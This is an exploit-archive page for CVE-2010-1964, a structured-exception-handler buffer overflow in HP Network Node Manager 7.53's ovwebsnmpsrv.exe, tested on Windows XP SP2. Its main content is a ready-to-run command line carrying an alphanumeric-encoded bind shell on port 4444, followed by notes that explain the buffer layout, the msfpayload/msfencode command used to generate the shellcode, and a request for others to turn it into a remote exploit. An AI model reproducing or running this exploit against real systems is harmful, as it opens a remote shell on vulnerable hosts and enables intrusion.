HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Published : 2010-07-07
# Author : bitform
# Previous Title : GSM SIM Utility Local Exploit Direct Ret ver.
# Next Title : Ubuntu PAM MOTD File Tampering (Privilege Escalation)

# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
# Date: 07/06/2010
# Author: bitform
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows XP SP2
# CVE: CVE-2010-1964

# Exploit:

C:Program FilesHP OpenViewwwwbinovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TUAAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC

# Notes: 

This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
a practical remote exploit. :D

Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)

Explanation of buffer:

"UXf-9Tf-9Tf-9TU"
Carve out EAX as the base register for the alphanumeric shellcode

"PYIIIIIIIIIIIIIIII7QZ"...
Alphanumeric bind shell
# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw

   / Overwrite SEH  
  [  ]
"YY5AZCCX,Y,XPSX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
      [                                           ]
	                     / Carve out non-conditional jmp to carve EAX code